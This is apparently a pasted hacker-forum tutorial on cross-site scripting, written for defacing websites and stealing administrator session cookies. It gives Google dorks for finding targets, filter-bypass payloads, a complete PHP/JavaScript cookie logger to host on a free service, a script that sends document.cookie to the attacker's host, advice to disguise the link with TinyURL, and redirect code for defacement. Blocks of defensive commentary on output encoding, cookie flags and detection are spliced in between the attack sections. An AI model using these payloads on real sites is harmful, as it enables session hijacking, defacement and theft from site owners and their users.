Kyfx

How It's Possible to Use a Bypass for an XSS Deface

Apr 5th, 2015
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59) <---- XSS strings

After the URL looks like site.com/search?q=<script>alert("server ghost was here");</script>, click OK. If you see that the JavaScript is working, make an image or photo or a website that will show that the site was hacked. The link will be like this: <html><body><img src="imagelink.jpg"/></body></html>. Now save this code anywhere in the website that will store it, for example a comment box etc.

We can also use HTML: <h1>Kyfx in Server</h1>
It's not mandatory that we use JavaScript.
Sometimes firewalls block this kind of attempt, so use a bypass.


Credits for the text below go to dR.0xYw0Rm
  11.  
XSS EXPLAINED IN DEPTH

This is my first XSS tutorial, in which I will explain in depth what XSS is and how it works.
I will try to explain it in the most n00b-friendly way.
Even the biggest websites might be vulnerable to XSS!! So never underestimate it!
KEEP IN MIND: This is for educational and informational purposes only, so me & CrackHackForum will not be held responsible for deals made by you.
What is XSS ?
[*]"XSS" is short for "Cross Site Scripting". As you can see from the name, XSS deals with scripting; to be more exact, JavaScript.
It's about injecting (almost) any JavaScript (and HTML/CSS) command/script into a website.
XSS flaws come up every time a website doesn't filter the attacker's input.
In other words: the attacker can inject his malicious script into a website, and the browser just runs the code or script.
What is HTML ?
[*]HyperText Markup Language (HTML) is the main markup language for creating web pages and other information that can be displayed in a web browser.
What is JavaScript?
[*]JavaScript (JS) is an interpreted computer programming language. As part of web browsers, implementations allow client-side scripts to interact with the user, control the browser, communicate asynchronously, and alter the document content that is displayed. It has also become common in server-side programming, game development and the creation of desktop applications.
Difference between Java & JavaScript
[*]Java is an OOP programming language while JavaScript is an OOP scripting language.
Java creates applications that run in a virtual machine or browser while JavaScript code runs in a browser only.
Java code needs to be compiled while JavaScript code is all in text.
They require different plug-ins.
Types of XSS:
[*]Reflected or Non-persistent XSS Attack:
When an attacker injects his malicious script into a search query, a search box, or the end of a URL, it's called a Reflected XSS Attack. It's like throwing a ball against a wall and receiving it back.
[*]Stored or Persistent XSS Attack:
This is when an injected XSS script is stored permanently on a website, for example in a guestbook or bulletin board. Stored XSS hits everyone who just reaches the site with the malicious code.
[*]Traditional versus DOM-based vulnerabilities
This is a rarely used method. Traditionally, cross-site scripting vulnerabilities would occur in server-side code responsible for preparing the HTML response to be served to the user. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.
We need to have some knowledge before attempting to perform an XSS attack; that's why I made the listing above.
How can we find websites vulnerable to XSS ?
[*]Google Dorks
[*]Web vulnerability scanners
[*]Manually
[*] Google Dorks:
Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
[*] Web vulnerability scanners:
Code:
Acunetix
Skipfish
OWASP ZAP
Nessus, etc.
[*] Manually, which I am going to explain to you now.
You don't need to add random vectors to the search box or whatever it is; you just need to analyze the source code.
So... can we have a look inside the code and see what the hell is going on there?
YES !
So I will show you guys how to analyze the source code and manipulate that damn alert box to fuckin' prompt.
Ok, this is my input box where I will insert:
Code:
dR.0xYw0Rm
[Image: tutorial1_zps3d773bc7.png]
Let's click "get source" and have a look at what's happening inside the source code..
[Image: tutorial2_zpseebb546e.png]
Code:
<textarea cols="80" rows="20" name="headers">dR.0xYw0Rm</textarea>
Hmmm.. let's try to close the </textarea> tag like this:
Code:
</textarea>dR.0xYw0Rm
[Image: tutorial3_zps165854c8.png]
Let's go inside the source code again and check..
[Image: tutorial4_zps90ba9937.png]
So as we can see, the source code has changed from:
Code:
dR.0xYw0Rm</textarea>
to
Code:
</textarea>dR.0xYw0Rm
Which means that we have closed the textarea tag and can try to insert our evil code.. Let's have a look at the page... do you see any difference?
[Image: tutorial5_zpsd7d8a00b.png]
Ok, the dR.0xYw0Rm ended up outside the box.
Let's try to insert the JavaScript code now *devilface*
Code:
<script>alert("dR.0xYw0Rm")</script>
[Image: tutorial6_zps3518ede8.png]
No box prompted? Let's check the source code:
[Image: tutorial7_zpscebf3ab5.png]
Code:
<textarea cols="80" rows="20" name="headers"></textarea><script>alert(\"dR.0xYw0Rm\")</script>
Damn, the quotes -> " <- got filtered (escaped with a backslash)..
There are many different filters which don't allow the box to prompt.
Can we do something to bypass them?!
DAMN YEAH !!!
Ok, now we are going to write our text as ASCII character codes and rebuild it with the JavaScript function String.fromCharCode (which turns a list of codes back into text), so the payload itself contains no quotes:
Code:
</textarea><script>alert(String.fromCharCode(100,82,46,48,120,89,119,48,82,109))</script>
Don't feel confused!
The numbers below are the ASCII values for dR.0xYw0Rm
Code:
100,82,46,48,120,89,119,48,82,109
So our code doesn't contain quotes anymore.
Let's insert it into the box
[Image: tutorial8_zps3078f5b9.png]
Let's click "get source" to execute the code,
[Image: tutorial9_zpsb15e1982.png]
So here it is !! We got the alert box, which means that the target is vulnerable to XSS !!!
This is the proper way to check for XSS vulnerabilities on websites.
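From the defender's side, the flaw in this walkthrough is that the submitted value is written into the response without HTML entity encoding, so the closing tag inside the input closes the real textarea. The block below is an added example, not code from the tutorial or its author: it renders the page's textarea the vulnerable way and the encoded way, and also applies a magic_quotes_gpc-style backslash escape to show why that does not stop the quote-free fromCharCode payload. The function names (escapeHtml, renderVulnerable, renderSafe, addSlashes, countTag, demo) and the sample inputs are constructed for the example.

```javascript
// Added example, not code from the tutorial or its author: the fix for the
// reflected textarea injection walked through above is HTML entity encoding
// of the value before it is written into the response. All function names
// and sample inputs here are constructed for the example.

// Encode the five characters that change meaning in HTML text and
// attribute contexts. This is plain HTML entity encoding.
function escapeHtml(untrusted) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// What the tutorial's page does: the submitted value lands in the response
// unchanged, so a "</textarea>" inside it closes the real element.
function renderVulnerable(headers) {
  return `<textarea cols="80" rows="20" name="headers">${headers}</textarea>`;
}

// Hardened version of the same markup: the value is entity-encoded, so the
// browser shows "</textarea>" as literal text inside the box.
function renderSafe(headers) {
  return `<textarea cols="80" rows="20" name="headers">${escapeHtml(headers)}</textarea>`;
}

// What magic_quotes_gpc does to input: a backslash before quotes and
// backslashes. It touches neither "<" nor ">", which is why the tutorial's
// quote-free String.fromCharCode payload is unaffected by it.
function addSlashes(value) {
  return String(value).replace(/[\\'"]/g, (ch) => "\\" + ch);
}

// Count opening and closing occurrences of a tag in the final markup.
function countTag(html, tagName) {
  const re = new RegExp(`</?${tagName}\\b`, "gi");
  return (html.match(re) || []).length;
}

// Constructed inputs mirroring the walkthrough above.
const breakout = "</textarea>dR.0xYw0Rm";
const scriptPayload = "</textarea><script>alert(String.fromCharCode(100,82))</script>";

// Summarise the renders as tag counts so the difference is measurable.
function demo() {
  return {
    // 3: the real open tag, the injected close, the real close
    vulnerableTextareas: countTag(renderVulnerable(breakout), "textarea"),
    // 2: only the real open/close survive; the payload is inert text
    safeTextareas: countTag(renderSafe(breakout), "textarea"),
    // 2: the backslash escape left <script> and </script> intact
    addSlashesStillHasScript: countTag(renderVulnerable(addSlashes(scriptPayload)), "script"),
    // 0: entity encoding leaves no script tag at all
    safeHasScript: countTag(renderSafe(scriptPayload), "script"),
  };
}

console.log(demo());
```

The point of the last two counts is that backslash escaping and HTML encoding are answers to different problems: magic_quotes_gpc was aimed at SQL string literals, while the textarea breakout only needs `<` and `>`, which it never touches.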
XSS Advanced Methods
Now I will share with you guys some ways to use XSS against a target.
KEEP IN MIND THAT FOR ANYTHING EVIL YOU DO TO A TARGET, YOU CAN END UP IN REALLY BIG TROUBLE !! SO ANYTHING YOU DO, YOU DO ON YOUR OWN. THIS IS JUST FOR EDUCATIONAL & INFORMATIONAL PURPOSES !!!
Cookie Stealing
[*]Cookie stealing is the most dangerous attack we can do with a Non-Persistent XSS; it will log the cookies of the user who accesses the page to a certain document.
Now I am going to explain to you step by step how to do this.
First we need to find a hosting website; personally I suggest you use 000webhost.com for uploading malicious code or anything else. So let's open an account there.
Now once we have created our site, let's go to File Manager, create a new file, and rename it CookieLog.txt
Leave that file blank, don't put anything inside. Now create another file called CookieLogger.php
In this file we have to add some code so it will write the cookies it receives into CookieLog.txt
So add the code below to CookieLogger.php, and don't forget to name it with the .php extension, otherwise it won't work!
Code:
<?php
/*
 * Created on 16. april. 2007
 * Created by Audun Larsen ([email protected])
 *
 * Copyright 2006 Munio IT, Audun Larsen
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */
if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
// ==
// URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
// web site you include a credit somewhere on the web site
// with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" + // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()"; // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";
    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+"; // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
                    + ch
                    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
                    "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for
    return encoded;
};
cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);
<?php
}
?>
Now that we have our cookie logger, we have to send it to the victim, which will be the website administrator.
So that the URL will be less suspicious, we need to shorten it with TinyURL.
Let's go to tinyurl.com and put in the URL, but don't forget to add the script at the end of the URL, and then shorten it!
This is the script:
Code:
<script>document.location="http://www.myhost.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
Once you get the cookie, you can use the Firefox add-on called "Cookie Manager" to manipulate or edit the cookie so you can hijack the administrator's session.
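What limits the cookie theft described above is the HttpOnly attribute on the session cookie: document.cookie never exposes a cookie set with that flag, so the script at the end of the URL receives nothing useful for the session. The block below is an added defender-side example, not code from the tutorial or its author: it parses Set-Cookie headers, reports which hardening attributes are missing, and lists the cookie names a script running in the page could read. The header values and the function names (parseSetCookie, auditSessionCookie, visibleToDocumentCookie) are constructed for the example.

```javascript
// Added example (not from the original post): audit Set-Cookie headers for
// the attributes that limit what an injected script can do with them.
// Header values below are constructed sample data, not from any real site.

// Parse one Set-Cookie header value into its name/value and the
// attributes relevant to XSS exposure.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? "" : pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [key, ...rest] = attr.split("=");
    const k = key.trim().toLowerCase();
    if (k === "httponly") cookie.httpOnly = true;
    else if (k === "secure") cookie.secure = true;
    else if (k === "samesite") cookie.sameSite = rest.join("=").trim() || null;
  }
  return cookie;
}

// Findings a reviewer would raise for a session cookie header.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push("missing HttpOnly: document.cookie can read it");
  if (!c.secure) findings.push("missing Secure: sent over plain HTTP");
  if (!c.sameSite) findings.push("missing SameSite: attached to cross-site requests");
  return findings;
}

// Names of the cookies that a script running in the page could read via
// document.cookie: exactly those set without HttpOnly.
function visibleToDocumentCookie(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => c.name);
}

// Constructed headers: the weak form the tutorial relies on, a hardened
// session cookie, and a harmless preference cookie.
const WEAK_SESSION = "PHPSESSID=abc123; Path=/";
const HARDENED_SESSION = "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax";
const THEME_COOKIE = "theme=dark; Path=/; Max-Age=31536000";

console.log("weak session:", auditSessionCookie(WEAK_SESSION));
console.log("hardened session:", auditSessionCookie(HARDENED_SESSION));
console.log("readable by page script:", visibleToDocumentCookie([HARDENED_SESSION, THEME_COOKIE]));
```

With the hardened header only the theme cookie is script-readable, which is the property to check for on any cookie that carries authentication.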
DEFACING
In order to deface a website with XSS you need to find a persistent XSS.
You can use the script below to redirect the visitors to your deface page. I suggest you use pastehtml[dot]com as it allows anonymous uploading.
Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACE/";</script>
XSS Filter Bypassing Methods:
[*]ASCII Bypassing
[*]Hex Bypassing
[*]Case Sensitive
[*]ASCII Bypassing when magic_quotes_gpc=ON
It causes every " (double quote), ' (single quote), and \ (backslash) to be escaped with a backslash automatically.
How to bypass it ?
Use the JavaScript function called
Code:
String.fromCharCode()
Just convert your text into decimal character codes as I showed you guys when we were performing the "attack".
[*]Hex Bypassing
We encode our script into hex so you can't see clearly at first look what the code will do.
The text:
Code:
<script>alert(dR.0xYw0Rm)</script>
How to bypass it ?
The text hex encoded (as URL percent-encoding):
Code:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%52%2e%30%78%59%77%30%52%6d%29%3c%2f%73%63%72%69%70%74%3e
[*]Case Sensitive Bypassing
This kind of bypass only works on really old & stupid filters, but it's always worth a try !
All we need to do is execute the script with mixed-case characters.
How to bypass it ?
Code:
<sCrIpT>alert('dR.0xYw0Rm');</ScRiPt>
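All three bypasses above work against filters that compare the raw request with a fixed, case-sensitive string. On the detection side the remedy is to decode and case-fold before matching. The block below is an added example, not code from the tutorial or its author: it percent-decodes and lower-cases constructed access-log request lines, matches them against a small illustrative signature list, and puts the result next to a naive exact-match filter of the kind the tutorial says these tricks defeat. The function names, the signature list and the log lines are constructed for the example.

```javascript
// Added example, not code from the tutorial: normalise a request before
// matching it, which is what defeats the three bypasses listed above.
// The signature list is illustrative, and the log lines are constructed.

// Percent-decode until the string stops changing, so a double-encoded
// value is reduced to the same form as a single-encoded one.
function percentDecode(s) {
  let prev = null;
  let cur = s;
  while (cur !== prev) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur.replace(/\+/g, " "));
    } catch (e) {
      break; // malformed %-sequence: keep what we have so far
    }
  }
  return cur;
}

// Case-folding after decoding makes "<sCrIpT>" and "%3Cscript%3E"
// both look like "<script>" to the matcher.
function normalize(s) {
  return percentDecode(s).toLowerCase();
}

// Markers of script injection, matched against the normalised form only.
const SIGNATURES = [
  { id: "script-tag", re: /<\s*\/?\s*script\b/ },
  { id: "fromcharcode", re: /string\.fromcharcode\s*\(/ },
];

function classify(requestLine) {
  const norm = normalize(requestLine);
  return SIGNATURES.filter(({ re }) => re.test(norm)).map(({ id }) => id);
}

// The kind of filter the tutorial's tricks get past: exact, case-sensitive,
// and applied to the raw (still encoded) request.
function naiveFilterBlocks(requestLine) {
  return requestLine.includes("<script>");
}

// Constructed access-log request lines: one benign, then the three variants
// from the tutorial (percent/hex encoded, mixed case, fromCharCode).
const SAMPLE_REQUESTS = [
  "GET /search.php?q=hello HTTP/1.1",
  "GET /search.php?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1",
  "GET /search.php?q=<sCrIpT>alert(1)</ScRiPt> HTTP/1.1",
  "GET /search.php?q=<script>alert(String.fromCharCode(100,82))</script> HTTP/1.1",
];

// One row per line: what the naive filter would do versus what normalised
// matching finds.
function report(lines) {
  return lines.map((line) => ({
    line,
    naiveBlocked: naiveFilterBlocks(line),
    hits: classify(line),
  }));
}

for (const row of report(SAMPLE_REQUESTS)) {
  console.log(row.naiveBlocked ? "naive:BLOCK" : "naive:pass ", row.hits.join(",") || "-", row.line);
}
```

Only the plain `<script>` line trips the naive filter; the normalised matcher flags all three payload variants and leaves the benign query alone. The same decode-then-match order applies to the server-side output encoding discussed earlier: a filter that looks at the encoded form is looking at the wrong string.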
I hope I clarified what XSS is and how it works; if you need help don't hesitate to PM me.
This tutorial was written entirely by me && it took a lot of time.
A simple +rep or thank you to keep the thread alive would be appreciated.
L33ch it but don't forget to give credits.
~ dR.0xYw0Rm